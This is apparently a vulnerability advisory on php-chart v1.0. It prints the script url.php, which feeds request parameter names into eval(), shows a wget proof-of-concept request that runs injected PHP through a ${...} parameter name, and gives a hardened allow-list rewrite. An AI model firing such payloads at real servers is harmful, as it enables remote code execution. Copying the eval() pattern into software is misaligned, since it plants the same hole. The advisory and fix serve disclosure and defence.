Using a local include vulnerability to execute arbitrary code - vulnerability warning - the black bar safety net

2013-01-19T00:00:00
ID MYHACK58:62201336798
Type myhack58
Reporter Anonymous (佚名)
Modified 2013-01-19T00:00:00

Description

Affected program: php-chart_v1.0

Official site: http://php-charts.com/

Defect type: PHP Code Execution.

===============================================================

Test platform system: Debian squeeze 6.0.6

Server software version: Apache/2.2.16 (Debian)

PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2012 20:08:59)

Copyright (c) 1997-2009 The PHP Group

Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies

with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH

================================================================

Program description:

Php-Charts is basically a class which can be used to generate different charts (Bar, Pie, Doughnut etc.) in different formats (PDF, PNG, JPG, HTML) using different data sources (csv, xml, MySQL, MS Sql, MS Access, PostgreSql, user defined data).

================================================================

Defect analysis

root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php

<?php
require("../lib/phpchart.class.php");

$color_var = array("txt_col", "line_col", "bg_color");

$cname = $_GET["type"];
$chart = new PHPChart($cname);

// Every GET parameter name ($key) and value is spliced into a PHP statement
// and passed to eval(); neither is validated first.
foreach ($_GET as $key => $value)
{
    if ($value != "")
    {
        if (in_array($key, $color_var))
            eval('$chart->'.$key.'="#'.$value.'";');
        else if ($value == 'yes')
            eval('$chart->'.$key.'= true;');
        else if ($value == 'no')
            eval('$chart->'.$key.'= false;');
        else if (is_numeric($value))
            eval('$chart->'.$key.'='.$value.';');
        else
            eval('$chart->'.$key."='".$value."';");
    }
}

$chart->genChart();

Exploitation:

root@debian:/tmp# wget 'http://hacker1.own//wp/chart/chart/wizard/url.php?${var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt

--2013-01-15 21:19:16-- http://hacker1.own//wp/chart/chart/wizard/url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY
Resolving hacker1.own... 127.0.0.1
Connecting to hacker1.own|127.0.0.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: “out.txt”

[ <=> ] 1,917 --.-K/s in 0s

2013-01-15 21:19:17 (8.56 MB/s) - “out.txt” saved [1917]

Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4

array(28) {
  ["DOCUMENT_ROOT"]=>
  string(28) "/etc/apache2/htdocs/hacker1/"
  ["GATEWAY_INTERFACE"]=>
  string(7) "CGI/1.1"
  ["HTTP_ACCEPT"]=>
  string(3) "*/*"
  ["HTTP_CLIENT_IP"]=>
  string(9) "127.0.0.1"
  ["HTTP_HOST"]=>
  string(11) "hacker1.own"
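The request above works because url.php concatenates each $_GET parameter name into a PHP statement and hands it to eval(): with the parameter name ${var_dump($_SERVER)} the generated statement is $chart->${var_dump($_SERVER)}='IZABEKAILOVEYOUBABY';, and PHP evaluates the expression inside ${...} to compute the property name, so var_dump() runs before any assignment takes place. The root cause is building code from request data at all, so the fix is to drop eval() and assign only allow-listed properties after type checks. The rewrite of url.php below is an added example, not code from the php-chart project or from the advisory author; it assumes that the PHPChart class exposes the properties it sets (txt_col, line_col and bg_color come from the original script; width, height, legend and title are hypothetical names used for illustration) and a genChart() method, as the original script uses.

```php
<?php
// Hardened rewrite of wizard/url.php (added example, not the project's code).
// No eval(): request data is only ever used as a value after validation,
// and property names come from a fixed allow-list, never from the client.
require("../lib/phpchart.class.php");

// Settable properties and the kind of value each accepts. Anything not listed
// is ignored, so a request can no longer name arbitrary properties or smuggle
// an expression such as ${...} through the parameter name.
// txt_col, line_col and bg_color are from the original script; the other
// names are hypothetical placeholders for whatever PHPChart really exposes.
$allowed = array(
    'txt_col'  => 'color',
    'line_col' => 'color',
    'bg_color' => 'color',
    'width'    => 'number',
    'height'   => 'number',
    'legend'   => 'bool',
    'title'    => 'string',
);

// The chart type is passed to the PHPChart constructor; restrict it to a
// simple identifier so it cannot carry path or code characters.
$cname = isset($_GET['type']) ? $_GET['type'] : '';
if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $cname)) {
    header('HTTP/1.0 400 Bad Request');   // works on PHP 5.3 as well
    exit('invalid chart type');
}
$chart = new PHPChart($cname);

// Iterate over the allow-list, not over $_GET, so $key is always trusted.
foreach ($allowed as $key => $kind) {
    if (!isset($_GET[$key]) || $_GET[$key] === '') {
        continue;
    }
    $value = $_GET[$key];
    switch ($kind) {
        case 'color':
            // exactly six hex digits; the leading '#' is added server-side
            if (!preg_match('/^[0-9A-Fa-f]{6}$/', $value)) continue 2;
            $chart->$key = '#' . $value;
            break;
        case 'number':
            if (!is_numeric($value)) continue 2;
            $chart->$key = $value + 0;            // coerce to int/float
            break;
        case 'bool':
            if ($value !== 'yes' && $value !== 'no') continue 2;
            $chart->$key = ($value === 'yes');
            break;
        case 'string':
            // plain assignment; no quoting is needed because no code is built
            $chart->$key = substr($value, 0, 200);
            break;
    }
}

$chart->genChart();
```

The behaviour the original script offered (colours get a '#', yes/no become booleans, numbers stay numeric, everything else is a string) is preserved, but each branch is an ordinary assignment rather than a generated statement, and `continue 2` skips the whole property when its value fails validation instead of falling through to the generic string case.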
